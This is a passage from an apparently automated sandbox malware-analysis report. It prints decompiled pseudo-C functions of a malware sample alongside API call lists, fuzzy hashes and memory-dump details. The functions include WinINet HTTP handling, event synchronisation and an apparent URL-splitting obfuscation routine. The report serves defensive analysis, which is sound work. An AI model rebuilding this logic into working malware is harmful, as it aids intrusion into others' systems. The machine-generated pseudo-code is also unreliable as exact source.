                                                    						if(_t64 != 0x3e5) {
                                                    							L8:
                                                    							if(_t64 == 0) {
                                                    								goto L9;
                                                    							}
                                                    						} else {
                                                    							_t64 = E010917ED( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                    							if(_t64 == 0) {
                                                    								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                    								goto L8;
                                                    							}
                                                    						}
                                                    					}
                                                    					return _t64;
                                                    				} else {
                                                    					_t54 = E010959B3(__ecx, __eax);
                                                    					if(_t54 != 0) {
                                                    						return _t54;
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,747581D0,00000000,00000000), ref: 01096BAE
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?,?), ref: 01096BC7
                                                    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 01096C40
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?,?), ref: 01096C5B
                                                      • Part of subcall function 010959B3: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 010959CA
                                                      • Part of subcall function 010959B3: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 010959DA
                                                      • Part of subcall function 010959B3: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01095A0C
                                                      • Part of subcall function 010959B3: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A31
                                                      • Part of subcall function 010959B3: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                                                    • String ID: @MqtNqt
                                                    • API String ID: 2176574591-2883916605
                                                    • Opcode ID: c0da6fe6f8ea612a0691adbfeec58833e90d19bf6cffaf8ad394a5325b385e25
                                                    • Instruction ID: a7d5aa27a0c0c0771ac206f763bbbdd955af68ead124222f5fb249678ac9f9d0
                                                    • Opcode Fuzzy Hash: c0da6fe6f8ea612a0691adbfeec58833e90d19bf6cffaf8ad394a5325b385e25
                                                    • Instruction Fuzzy Hash: 72410672A00209AFCF229BA9CC14AAE77F9FF84360F114568F5D5D3150EA32E841AB40
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E01093A2A() {
                                                    				void* _v0;
                                                    				void** _t3;
                                                    				void** _t5;
                                                    				void** _t7;
                                                    				void** _t8;
                                                    				void* _t10;
                                                    
                                                    				_t3 =  *0x109a3cc; // 0x1b09600
                                                    				__imp__( &(_t3[0x10]));
                                                    				while(1) {
                                                    					_t5 =  *0x109a3cc; // 0x1b09600
                                                    					_t1 =  &(_t5[0x16]); // 0x0
                                                    					if( *_t1 == 0) {
                                                    						break;
                                                    					}
                                                    					Sleep(0xa);
                                                    				}
                                                    				_t7 =  *0x109a3cc; // 0x1b09600
                                                    				_t10 =  *_t7;
                                                    				if(_t10 != 0 && _t10 != 0x109b827) {
                                                    					HeapFree( *0x109a2d8, 0, _t10);
                                                    					_t7 =  *0x109a3cc; // 0x1b09600
                                                    				}
                                                    				 *_t7 = _v0;
                                                    				_t8 =  &(_t7[0x10]);
                                                    				__imp__(_t8);
                                                    				return _t8;
                                                    			}

                                                    APIs
                                                    • RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01093A33
                                                    • Sleep.KERNEL32(0000000A), ref: 01093A3D
                                                    • HeapFree.KERNEL32(00000000), ref: 01093A6B
                                                    • RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01093A80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                    • String ID: Uqt
                                                    • API String ID: 58946197-2320327147
                                                    • Opcode ID: ab7c80c06835518af6b5f55c89bcb992a115117e9a49a7b1eb3dd4ab70270bc7
                                                    • Instruction ID: 2a6207eb19fd86eedc5839011a407bf81b994059da64462ca6c6deb34eec63be
                                                    • Opcode Fuzzy Hash: ab7c80c06835518af6b5f55c89bcb992a115117e9a49a7b1eb3dd4ab70270bc7
                                                    • Instruction Fuzzy Hash: 5DF0B774B00201DFEB248B69E8A9A2977F4BB44714B04C058F9D2DB2A8C67AA800DB10
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E01093AFC(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                    				void* _v8;
                                                    				char _v48;
                                                    				void* __edi;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t30;
                                                    				intOrPtr _t34;
                                                    				intOrPtr* _t42;
                                                    				void* _t43;
                                                    				void* _t46;
                                                    				intOrPtr* _t48;
                                                    				void* _t49;
                                                    				intOrPtr _t51;
                                                    
                                                    				_t42 = _a16;
                                                    				_t48 = __eax;
                                                    				_t22 =  *0x109a348; // 0xa6d5a8
                                                    				_t2 = _t22 + 0x109b67a; // 0x657a6973
                                                    				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                                                    				if( *0x109a2ec >= 5) {
                                                    					_t30 = E01093660(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                                                    					L5:
                                                    					_a4 = _t30;
                                                    					L6:
                                                    					if(_a4 != 0) {
                                                    						L9:
                                                    						 *0x109a2ec =  *0x109a2ec + 1;
                                                    						L10:
                                                    						return _a4;
                                                    					}
                                                    					_t50 = _a16;
                                                    					 *_t48 = _a16;
                                                    					_t49 = _v8;
                                                    					 *_t42 = E01095E1E(_t50, _t49);
                                                    					_t34 = E010917B6(_t49, _t50);
                                                    					if(_t34 != 0) {
                                                    						 *_a8 = _t49;
                                                    						 *_a12 = _t34;
                                                    						if( *0x109a2ec < 5) {
                                                    							 *0x109a2ec =  *0x109a2ec & 0x00000000;
                                                    						}
                                                    						goto L10;
                                                    					}
                                                    					_a4 = 0xbf;
                                                    					E01091103();
                                                    					HeapFree( *0x109a2d8, 0, _t49);
                                                    					goto L9;
                                                    				}
                                                    				_t51 =  *0x109a3e0; // 0x1b09be0
                                                    				if(RtlAllocateHeap( *0x109a2d8, 0, 0x800) == 0) {
                                                    					_a4 = 8;
                                                    					goto L6;
                                                    				}
                                                    				_t30 = E01091910(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                                                    				goto L5;
                                                    			}

                                                    APIs
                                                    • wsprintfA.USER32 ref: 01093B1E
                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01093B43
                                                      • Part of subcall function 01091910: GetTickCount.KERNEL32 ref: 01091927
                                                      • Part of subcall function 01091910: wsprintfA.USER32 ref: 01091974
                                                      • Part of subcall function 01091910: wsprintfA.USER32 ref: 01091991
                                                      • Part of subcall function 01091910: wsprintfA.USER32 ref: 010919B3
                                                      • Part of subcall function 01091910: wsprintfA.USER32 ref: 010919DA
                                                      • Part of subcall function 01091910: wsprintfA.USER32 ref: 010919FB
                                                      • Part of subcall function 01091910: wsprintfA.USER32 ref: 01091A26
                                                      • Part of subcall function 01091910: HeapFree.KERNEL32(00000000,?), ref: 01091A39
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 01093BBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: wsprintf$Heap$Free$AllocateCountTick
                                                    • String ID: Uqt
                                                    • API String ID: 1307794992-2320327147
                                                    • Opcode ID: 9cd65b957b89eed36ceb5d8b6f817c2fce8633b5cb2eed2ebb9a371f9794db72
                                                    • Instruction ID: a77a9526725b72eafbea2db7ec977044a551fc9f56f165f358039194775640f1
                                                    • Opcode Fuzzy Hash: 9cd65b957b89eed36ceb5d8b6f817c2fce8633b5cb2eed2ebb9a371f9794db72
                                                    • Instruction Fuzzy Hash: 7E316F71600219EFCF21DF68D8A4EDA3BBCFB08354F108066FA859B245D7769644DFA1
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    APIs
                                                    • SysAllocString.OLEAUT32(?), ref: 01094F33
                                                    • SysFreeString.OLEAUT32(00000000), ref: 01095018
                                                      • Part of subcall function 01092715: SysAllocString.OLEAUT32(01099284), ref: 01092765
                                                    • SafeArrayDestroy.OLEAUT32(00000000), ref: 0109506B
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0109507A
                                                      • Part of subcall function 01096002: Sleep.KERNEL32(000001F4), ref: 0109604A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                    • String ID:
                                                    • API String ID: 3193056040-0
                                                    • Opcode ID: 46af511fdf83ba3120b43f13ce746b7e51e5803fa107573a16d2bbee1fb89332
                                                    • Instruction ID: 462f0cac9ee9a3e81585511c8c7a0a80ddc9d3dd1ff452cf10225af8483a77b5
                                                    • Opcode Fuzzy Hash: 46af511fdf83ba3120b43f13ce746b7e51e5803fa107573a16d2bbee1fb89332
                                                    • Instruction Fuzzy Hash: C6517D3550060AAFDB12CFA9C864ADEBBB5BFC8740B148469F694DB210DB32ED05DB90
                                                     Uniqueness
                                                     • Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E010923D6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v16;
                                                    				void _v156;
                                                    				void _v428;
                                                    				void* _t55;
                                                    				unsigned int _t56;
                                                    				signed int _t66;
                                                    				signed int _t74;
                                                    				void* _t76;
                                                    				signed int _t79;
                                                    				void* _t81;
                                                    				void* _t92;
                                                    				void* _t96;
                                                    				signed int* _t99;
                                                    				signed int _t101;
                                                    				signed int _t103;
                                                    				void* _t107;
                                                    
                                                    				_t92 = _a12;
                                                    				_t101 = __eax;
                                                    				_t55 = E01096B54(_a16, _t92);
                                                    				_t79 = _t55;
                                                    				if(_t79 == 0) {
                                                    					L18:
                                                    					return _t55;
                                                    				}
                                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                    				_t81 = 0;
                                                    				_t96 = 0x20;
                                                    				if(_t56 == 0) {
                                                    					L4:
                                                    					_t97 = _t96 - _t81;
                                                    					_v12 = _t96 - _t81;
                                                    					E01092700(_t79,  &_v428);
                                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01097455(_t101,  &_v428, _a8, _t96 - _t81);
                                                    					E01097455(_t79,  &_v156, _a12, _t97);
                                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                    					_t66 = E01092700(_t101, 0x109a1d0);
                                                    					_t103 = _t101 - _t79;
                                                    					_a8 = _t103;
                                                    					if(_t103 < 0) {
                                                    						L17:
                                                    						E01092700(_a16, _a4);
                                                    						E01094596(_t79,  &_v428, _a4, _t97);
                                                    						memset( &_v428, 0, 0x10c);
                                                    						_t55 = memset( &_v156, 0, 0x84);
                                                    						goto L18;
                                                    					}
                                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                    					do {
                                                    						if(_v8 != 0xffffffff) {
                                                    							_push(1);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push( *_t99);
                                                    							L0109821A();
                                                    							_t74 = _t66 +  *(_t99 - 4);
                                                    							asm("adc edx, esi");
                                                    							_push(0);
                                                    							_push(_v8 + 1);
                                                    							_push(_t92);
                                                    							_push(_t74);
                                                    							L01098214();
                                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                    								_t74 = _t74 | 0xffffffff;
                                                    								_v16 = _v16 & 0x00000000;
                                                    							}
                                                    						} else {
                                                    							_t74 =  *_t99;
                                                    						}
                                                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                    						_a12 = _t74;
                                                    						_t76 = E01093C88(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                    						while(1) {
                                                    							 *_t99 =  *_t99 - _t76;
                                                    							if( *_t99 != 0) {
                                                    								goto L14;
                                                    							}
                                                    							L13:
                                                    							_t92 =  &_v156;
                                                    							if(E01094780(_t79, _t92, _t106) < 0) {
                                                    								break;
                                                    							}
                                                    							L14:
                                                    							_a12 = _a12 + 1;
                                                    							_t76 = E01096196(_t79,  &_v156, _t106, _t106);
                                                    							 *_t99 =  *_t99 - _t76;
                                                    							if( *_t99 != 0) {
                                                    								goto L14;
                                                    							}
                                                    							goto L13;
                                                    						}
                                                    						_a8 = _a8 - 1;
                                                    						_t66 = _a12;
                                                    						_t99 = _t99 - 4;
                                                    						 *(0x109a1d0 + _a8 * 4) = _t66;
                                                    					} while (_a8 >= 0);
                                                    					_t97 = _v12;
                                                    					goto L17;
                                                    				}
                                                    				while(_t81 < _t96) {
                                                    					_t81 = _t81 + 1;
                                                    					_t56 = _t56 >> 1;
                                                    					if(_t56 != 0) {
                                                    						continue;
                                                    					}
                                                    					goto L4;
                                                    				}
                                                    				goto L4;
                                                    			}
                                                    0x010924d6
                                                    0x01092501
                                                    0x01092504
                                                    0x01092507
                                                    0x0109250e
                                                    0x0109250e
                                                    0x0109251b
                                                    0x00000000
                                                    0x0109251b
                                                    0x01092407
                                                    0x0109240b
                                                    0x0109240c
                                                    0x0109240e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0109240e
                                                    0x00000000

APIs
• _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01092489
• _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0109249F
• memset.NTDLL ref: 01092548
• memset.NTDLL ref: 0109255E
Memory Dump Source
• Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
Similarity
• API ID: memset$_allmul_aulldiv
• String ID:
• API String ID: 3041852380-0
• Opcode ID: d3fba248f9503f07dcbc97d12160bcdd631804a29435e6c23a14d4f1ddc1193f
• Instruction ID: ad0132a92c91110fddb91ef1affd7e79580d50a04c020d1683e3cd285f4a287a
• Opcode Fuzzy Hash: d3fba248f9503f07dcbc97d12160bcdd631804a29435e6c23a14d4f1ddc1193f
• Instruction Fuzzy Hash: D941C47160021ABBDF10DF68CCA0BEE77B5EF55310F008569F999A7281DB70AE54DB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
E01094689(signed int _a4, signed int* _a8) {
    void* __ecx;
    void* __edi;
    signed int _t6;
    intOrPtr _t8;
    intOrPtr _t12;
    short* _t19;
    void* _t25;
    signed int* _t28;
    CHAR* _t30;
    long _t31;
    intOrPtr* _t32;

    _t6 =  *0x109a310; // 0xd448b889
    _t32 = _a4;
    _a4 = _t6 ^ 0x109a6410;
    _t8 =  *0x109a348; // 0xa6d5a8
    _t3 = _t8 + 0x109b87a; // 0x61636f4c
    _t25 = 0;
    _t30 = E01096FEF(_t3, 1);
    if(_t30 != 0) {
        _t25 = CreateEventA(0x109a34c, 1, 0, _t30);
        E0109692B(_t30);
    }
    _t12 =  *0x109a2fc; // 0x2000000a
    if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E010931AB() != 0) {
        L12:
        _t28 = _a8;
        if(_t28 != 0) {
             *_t28 =  *_t28 | 0x00000001;
        }
        _t31 = E01097066(_t32, 0);
        if(_t31 == 0 && _t25 != 0) {
            _t31 = WaitForSingleObject(_t25, 0x4e20);
        }
        if(_t28 != 0 && _t31 != 0) {
             *_t28 =  *_t28 & 0xfffffffe;
        }
        goto L20;
    } else {
        _t19 =  *0x109a124( *_t32, 0x20);
        if(_t19 != 0) {
             *_t19 = 0;
            _t19 = _t19 + 2;
        }
        _t31 = E01095F7C(0,  *_t32, _t19, 0);
        if(_t31 == 0) {
            if(_t25 == 0) {
                L22:
                return _t31;
            }
            _t31 = WaitForSingleObject(_t25, 0x4e20);
            if(_t31 == 0) {
                L20:
                if(_t25 != 0) {
                    CloseHandle(_t25);
                }
                goto L22;
            }
        }
        goto L12;
    }
}

Instruction addresses: 0x0109468a, 0x01094691, 0x0109469b, 0x0109469f, 0x010946a5, 0x010946b4, 0x010946bb, 0x010946bf, 0x010946d1, 0x010946d3, 0x010946d3, 0x010946d8, 0x010946df, 0x01094736, 0x01094736, 0x0109473c, 0x0109473e, 0x0109473e, 0x01094748, 0x0109474c, 0x0109475e, 0x0109475e, 0x01094762, 0x01094768, 0x01094768, 0x00000000, 0x010946f8, 0x010946fd, 0x01094705, 0x01094709, 0x0109470d, 0x0109470d, 0x0109471a, 0x0109471e, 0x01094722, 0x01094777, 0x0109477d, 0x0109477d, 0x01094730, 0x01094734, 0x0109476b, 0x0109476d, 0x01094770, 0x01094770, 0x00000000, 0x0109476d, 0x01094734, 0x00000000, 0x0109471e

APIs
  • Part of subcall function 01096FEF: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,01B09DD8,00000000,?,?,69B25F44,00000005,0109A00C,4D283A53,?,?), ref: 01097025
  • Part of subcall function 01096FEF: lstrcpy.KERNEL32(00000000,00000000), ref: 01097049
  • Part of subcall function 01096FEF: lstrcat.KERNEL32(00000000,00000000), ref: 01097051
• CreateEventA.KERNEL32(0109A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,010929BE,?,?,?), ref: 010946CA
  • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
• WaitForSingleObject.KERNEL32(00000000,00004E20,010929BE,00000000,00000000,?,00000000,?,010929BE,?,?,?), ref: 0109472A
• WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,010929BE,?,?,?), ref: 01094758
• CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,010929BE,?,?,?), ref: 01094770
Memory Dump Source
• Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
Similarity
• API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
• String ID:
• API String ID: 73268831-0
• Opcode ID: 3faff5a64b556390f7fa44cf71e3eeec31d1f36bbf9be2f7c9c7ca893fb5b1fb
• Instruction ID: f7bfb8f4efa6386895077b8b4b1223fb12b91e2d65fe86b1c86250d9b47cfbed
• Opcode Fuzzy Hash: 3faff5a64b556390f7fa44cf71e3eeec31d1f36bbf9be2f7c9c7ca893fb5b1fb
• Instruction Fuzzy Hash: B1215C326007159BDF319E6C9DB4AAFB7E9FF8A710B050259FAD1DB104D765C802A740
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 39%
E0109290F(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
    intOrPtr _v12;
    void* _v16;
    void* _v28;
    char _v32;
    void* __esi;
    void* _t29;
    void* _t38;
    signed int* _t39;
    void* _t40;

    _t36 = __ecx;
    _v32 = 0;
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    _v12 = _a4;
    _t38 = E01092D11(__ecx,  &_v32);
    if(_t38 != 0) {
        L12:
        _t39 = _a8;
        L13:
        if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
            _t23 =  &(_t39[1]);
            if(_t39[1] != 0) {
                E01091EE8(_t23);
            }
        }
        return _t38;
    }
    if(E0109181A(0x40,  &_v16) != 0) {
        _v16 = 0;
    }
    _t40 = CreateEventA(0x109a34c, 1, 0,  *0x109a3e4);
    if(_t40 != 0) {
        SetEvent(_t40);
        Sleep(0xbb8);
        CloseHandle(_t40);
    }
    _push( &_v32);
    if(_a12 == 0) {
        _t29 = E01096940(_t36);
    } else {
        _push(0);
        _push(0);
        _push(0);
        _push(0);
        _push(0);
        _t29 = E0109202C(_t36);
    }
    _t41 = _v16;
    _t38 = _t29;
    if(_v16 != 0) {
        E0109739F(_t41);
    }
    if(_t38 != 0) {
        goto L12;
    } else {
        _t39 = _a8;
        _t38 = E01094689( &_v32, _t39);
        goto L13;
    }
}

Instruction addresses: 0x0109290f, 0x0109291c, 0x01092922, 0x01092923, 0x01092924, 0x01092925, 0x01092926, 0x0109292a, 0x01092936, 0x0109293a, 0x010929c2, 0x010929c2, 0x010929c5, 0x010929c7, 0x010929cf, 0x010929d5, 0x010929d8, 0x010929d8, 0x010929d5, 0x010929e3, 0x010929e3, 0x0109294d, 0x0109294f, 0x0109294f, 0x01092966, 0x0109296a, 0x0109296d, 0x01092978, 0x0109297f, 0x0109297f, 0x01092988, 0x0109298c, 0x0109299a, 0x0109298e, 0x0109298e, 0x0109298f, 0x01092990, 0x01092991, 0x01092992, 0x01092993, 0x01092993, 0x0109299f, 0x010929a2, 0x010929a6, 0x010929a8, 0x010929a8, 0x010929af, 0x00000000, 0x010929b1, 0x010929b1, 0x010929be, 0x00000000, 0x010929be

APIs
• CreateEventA.KERNEL32(0109A34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 01092960
• SetEvent.KERNEL32(00000000), ref: 0109296D
• Sleep.KERNEL32(00000BB8), ref: 01092978
• CloseHandle.KERNEL32(00000000), ref: 0109297F
  • Part of subcall function 01096940: WaitForSingleObject.KERNEL32(00000000,?,?,?,0109299F,?,0109299F,?,?,?,?,?,0109299F,?), ref: 01096A1A
Memory Dump Source
• Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
Similarity
• API ID: Event$CloseCreateHandleObjectSingleSleepWait
• String ID:
• API String ID: 2559942907-0
• Opcode ID: ba75829ba36d2d47ae39f973cc59a981e1acccc8372e64892ede2c2d83155a1f
• Instruction ID: 7d127cc94e5021eb633533b4f5a7286fc15da5481625112fd8ad5ad7c5705881
• Opcode Fuzzy Hash: ba75829ba36d2d47ae39f973cc59a981e1acccc8372e64892ede2c2d83155a1f
• Instruction Fuzzy Hash: 9121AA73D0011ABFDF20BFE888A59DE77ECAB48350B014469FBE5A7100D7359945D7A0
Uniqueness

Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E01095C78(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                    				intOrPtr _v8;
                                                    				void* _v12;
                                                    				void* _v16;
                                                    				intOrPtr _t26;
                                                    				intOrPtr* _t28;
                                                    				intOrPtr _t31;
                                                    				intOrPtr* _t32;
                                                    				void* _t39;
                                                    				int _t46;
                                                    				intOrPtr* _t47;
                                                    				int _t48;
                                                    
                                                    				_t47 = __eax;
                                                    				_push( &_v12);
                                                    				_push(__eax);
                                                    				_t39 = 0;
                                                    				_t46 = 0;
                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                    				_v8 = _t26;
                                                    				if(_t26 < 0) {
                                                    					L13:
                                                    					return _v8;
                                                    				}
                                                    				if(_v12 == 0) {
                                                    					Sleep(0xc8);
                                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                    				}
                                                    				if(_v8 >= _t39) {
                                                    					_t28 = _v12;
                                                    					if(_t28 != 0) {
                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                    						_v8 = _t31;
                                                    						if(_t31 >= 0) {
                                                    							_t46 = lstrlenW(_v16);
                                                    							if(_t46 != 0) {
                                                    								_t46 = _t46 + 1;
                                                    								_t48 = _t46 + _t46;
                                                    								_t39 = E01096A51(_t48);
                                                    								if(_t39 == 0) {
                                                    									_v8 = 0x8007000e;
                                                    								} else {
                                                    									memcpy(_t39, _v16, _t48);
                                                    								}
                                                    								__imp__#6(_v16);
                                                    							}
                                                    						}
                                                    						_t32 = _v12;
                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                    					}
                                                    					 *_a4 = _t39;
                                                    					 *_a8 = _t46 + _t46;
                                                    				}
                                                    				goto L13;
                                                    			}

                                                    Instruction addresses (one per decompiled line; column alignment lost in extraction): 0x01095c84 to 0x01095d34

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                    • String ID:
                                                    • API String ID: 1198164300-0
                                                    • Opcode ID: 4be9f642a36793e3c584b97db0e9d6712f0666e17e7a81a94ca26d5e93408b5a
                                                    • Instruction ID: 57c779990988da8b1569ce3c59da92016f40158344f0892c6712f2d491669ef2
                                                    • Opcode Fuzzy Hash: 4be9f642a36793e3c584b97db0e9d6712f0666e17e7a81a94ca26d5e93408b5a
                                                    • Instruction Fuzzy Hash: 2F21327590120AEFDF11EFA9D8989DEBBF4FF48204F1041AAE99597210E735DA01DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			// Takes a NUL-terminated ASCII string in EAX and returns a heap copy in which a '/'
                                                    			// has been inserted after every run of 8..23 bytes. Run lengths come from a 32-bit
                                                    			// LCG (multiplier 0x19660d, increment 0x3c6ef35f) whose state is the global at
                                                    			// 0x109a2f0, so the split positions vary per call. Note the do/while: the first
